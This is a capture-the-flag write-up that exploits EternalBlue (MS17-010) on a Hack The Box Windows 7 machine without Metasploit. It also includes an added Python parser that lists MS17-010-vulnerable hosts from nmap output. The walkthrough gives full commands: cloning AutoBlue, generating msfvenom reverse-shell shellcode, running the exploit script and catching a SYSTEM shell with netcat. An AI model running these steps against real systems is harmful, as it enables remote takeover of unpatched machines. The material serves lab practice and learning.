I had already done this machine, but with a lot, a lot of Metasploit. Honestly, not using Metasploit for EternalBlue only makes sense for the OSCP, ha. The good news is that I found a script that is almost as wonderful.
As always, we start with an nmap scan (two of them in this case):
root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:07 CET
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.67% done; ETC: 21:09 (0:00:00 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.024s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (87%)
OS CPE: cpe:/h:fortinet:fortigate_100d
Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.09 seconds
And to check for vulnerabilities:
root@Kali2:~/Downloads# nmap --script vuln -p 445 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:06 CET
Nmap scan report for 10.10.10.40
Host is up (0.071s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 30.32 seconds
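A small parser, added here and not part of the original post or of AutoBlue, that reads normal nmap output like the vuln scan above and lists the hosts whose smb-vuln-ms17-010 script reports State: VULNERABLE, so a wider -oN scan of a network can be turned into a patch-tracking list. The sample input is the scan above, trimmed.

```python
import re

# Nmap "--script vuln" output for port 445, reproduced (trimmed) from the
# scan above and embedded here as the sample input for this parser.
NMAP_VULN_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")  # NSE script header line
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")                 # detail line of a script
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(text):
    """Map host -> {script_id: {"state": ..., "cves": [...]}} from normal nmap output."""
    results, host, script = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # new host: reset the script context
            host, script = m.group(1), None
            results[host] = {}
            continue
        m = SCRIPT_RE.match(line)
        if m and host:             # one-line scripts carry their result on the header
            script = m.group(1)
            results[host][script] = {"state": m.group(2).strip() or "UNKNOWN", "cves": []}
            continue
        m = STATE_RE.match(line)   # multi-line scripts report "State:" on a later line
        if m and script:
            results[host][script]["state"] = m.group(1)
        for cve in (CVE_RE.findall(line) if script else ()):
            if cve not in results[host][script]["cves"]:
                results[host][script]["cves"].append(cve)
    return results


def vulnerable_hosts(results, script_id="smb-vuln-ms17-010"):
    """Hosts whose given NSE script reports State: VULNERABLE, for patch tracking."""
    return sorted(h for h, s in results.items()
                  if s.get(script_id, {}).get("state") == "VULNERABLE")
```

Every host it lists is still exposing SMBv1 without the MS17-010 update referenced in the scan output.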
Now that we know it is vulnerable to EternalBlue, we download a wonderful script:
# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
root@Kali2:~/Downloads# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
Cloning into 'AutoBlue-MS17-010'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 102 (delta 12), reused 2 (delta 1), pack-reused 76
Receiving objects: 100% (102/102), 76.26 KiB | 780.00 KiB/s, done.
Resolving deltas: 100% (52/52), done.
Now we generate the shell:
root@Kali2:~/Downloads# cd AutoBlue-MS17-010/shellcode/
root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
                _.-;;-._
             '-..-'|   ||   |
             '-..-'|_.-;;-._|
             '-..-'|   ||   |
             '-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.10.14.9
LPORT you want x64 to listen on:
1234
LPORT you want x86 to listen on:
1235
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1235
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
Now we use the exploit for Windows 7 (INVALID_PARAMETER is good... ha, don't be alarmed):
root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# cd ..
root@Kali2:~/Downloads/AutoBlue-MS17-010# ls
eternalblue_exploit10.py  eternal_checker.py  mysmb.py  zzz_exploit.py
eternalblue_exploit7.py   LICENSE             README.md
root@Kali2:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@Kali2:~/Downloads# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
And that's it, we are admin on Eternal Blue without using Metasploit 🙂